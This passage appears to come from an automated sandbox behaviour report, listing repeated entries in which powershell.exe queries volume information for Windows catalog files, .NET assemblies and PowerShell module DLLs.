Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
